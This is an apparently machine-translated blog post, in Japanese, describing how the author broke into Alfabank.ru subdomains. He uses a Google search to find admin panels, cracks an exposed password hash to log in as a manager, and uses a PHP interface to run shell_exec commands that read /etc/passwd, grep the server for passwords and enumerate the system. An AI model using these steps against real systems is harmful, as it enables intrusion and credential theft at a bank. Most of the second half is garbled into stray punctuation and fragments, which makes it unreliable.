Googleを使用して*******。Alfabank.ruで管理者+シェルを検索

「SQLインジェクションの検索...」の投稿で示されたアルファバンクのテクニカルサポートの対応にがっかりしたため、他のサブドメインでの状況を確認することにしました。



私が最初にしたことは、b ***。Alfabank.ruで同じgoogleとプレーン「site:alfabank.ru inurl:/ admin /」を使用して管理パネルを見つけたことです。





そして、私はそこで何を見ましたか?



控えめなメニューは、 PHPinfo() 、サイト設定などを約束してくれました



すでに私の手元には、編集可能なサイト設定がありました:





私が見つけたものについて少しうろついて、 別のサブドメインの言及に気付きました(投稿の最後で読むため、ここではサブドメインの名前を示しません)。

繰り返しますが、このサブドメインの名前による単純なグーグル検索により、m ***** kayaという名前のユーザーのページがすぐに見つかる出力が得られます。



そこで(まあ、奇跡!)、慎重な開発者がvar_dumpオブジェクトを持ってきたので、パスワードのハッシュが表示されます: 1d0258c2440a8d19e716292b231e3190





さて、レインボーテーブルでそれを探しますか? そして、パスワードマネージャーを見つけました。 私の意見では、あまり洗練されていませんが、少なくとも「愛/秘密/性別/神」ではありません。 nm ***** kaya@alfabank.ru:managerにログインしました。



これで、登録された参加者、銀行員、およびサイト管理者の権利が得られました。これは重要です。 このリソースのすべてのユーザーにアクセスできるという事実に加えて、利用可能な機能が拡張されました



もちろん、私は即座に、任意のphpコマンド実行するためインターフェースに興味をそそられました(ところで、誰かがこのリソースで必要な理由を私に説明できますか?)、私はほとんど無限の研究の機会を得ました、わかりますよね?):

echo shell_exec('uname -a');
echo shell_exec('grep -r "password" /usr/ > /var/tmp/tst.log');
echo shell_exec('find / -type d -perm 07700');
echo shell_exec('cat /etc/passwd');
echo shell_exec('ifconfig');
echo shell_exec('ps auxww');
echo shell_exec('cat /usr/local/etc/apache22/Includes/phpmyadmin.conf');
echo shell_exec('which wget');

      
      





.



, , www . , /files/ 0777.



, , , , .

, "-"!

,

, , ,

.



:

shell ,

[ ], - "".

[site-coder]@ gmail.com.



:

...

login: [login]

pass: manager



php shell_exec('PROFIT').

, .










:





:

, .



! , , , .



.



, , , , – . , « » . , . , , , , .



!



PS «», . , , . , , . , , , , .










, .



090h .



, , .

.



All Articles